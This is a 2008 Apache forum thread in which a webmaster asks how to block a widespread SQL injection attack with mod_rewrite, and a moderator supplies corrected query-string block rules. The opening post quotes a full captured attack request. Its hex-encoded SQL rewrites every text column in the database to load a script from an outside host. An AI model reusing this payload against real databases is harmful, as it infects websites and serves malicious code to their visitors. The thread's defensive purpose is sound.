1. Home
  2. Forums Index
  3. Server Side / Apache Web Server 5:14 pm May 2, 2026

Forum Moderators: phranque

Message Too Old, No Replies

Latest SQL injection, trying to prevent hacks via mod rewrite

         

concepts99

5:10 pm on Aug 16, 2008 (gmt 0)

10+ Year Member



Hello,

There is a new wave of SQL injection via the method below

It uses the set CHAR

<snip>

I am getting hit 6-10 times every five minutes. I want to avoid the server from processing this request all together.

I see the sample has CHAR(4000) and EXEC(@S) as a common name.

I have tried

RewriteEngine on
RewriteCond %{QUERY_STRING} .*char\(4000\).* [NC]
RewriteRule . - [F]
RewriteCond %{QUERY_STRING} .*CHAR%284000%28.* [NC]
RewriteRule . - [F]

but it was written for IIs. It doesnt seem to work for my Apache. Can anyone offer some advice. I am sure others will also find this useful since this attack is so widespread.

Request URI: /x/product.php?productid=5782;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228343030302920444543
4C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D65206672
6F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78
747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D3233
31206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20
205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547
494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C
2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A7322
3E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E
3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F73637269
70743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320
454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR
(4000));ExEC(@S);

[edited by: jdMorgan at 5:39 pm (utc) on Aug. 16, 2008]
[edit reason] No URLs, please. See Terms of Service. [/edit]

jdMorgan

5:52 pm on Aug 16, 2008 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



You cannot prevent the server from processing the request altogether, unless you have a deep-packet-inspection firewall protecting your server -- which would prevent the request from reaching your server. The code will simply tell the server to return a 403-Forbidden response.

The second rule's RewriteCond is malformed, in that "%" is a special character for mod_rewrite, and it was not escaped in the code. The patterns also have unnecessary ".*" subpatterns in them, which do nothing since the patterns are not anchored. I'd suggest: 


RewriteEngine on
RewriteCond %{QUERY_STRING} DECLARE¦CHAR¦SET¦CAST¦EXEC [NC]
RewriteRule . - [F]

Important: Replace the broken pipe "¦" characters with solid pipes before use; Posting on this forum modifies the pipe characters.

This will catch any or all of those command words. Of course, you will need to use a more-specific pattern if your site actually needs to allow any of those commands to be passed in a query string -- certainly not a good idea.

If this code does not return a 403-forbidden response (you can test it manually using any of all of those words in a query to any page) on your server, then you may need to preface the code above with: 


Options +FollowSymLinks

If this doesn't help, then please post a more thorough description of how you tested, what URLs you tried, what were the results, and how those results differed from your expectations.

Jim

 

Join The Conversation

Moderators and Top Contributors

Hot Threads This Week

  1. Home
  2. Forums Index
  3. Server Side / Apache Web Server 5:14 pm May 2, 2026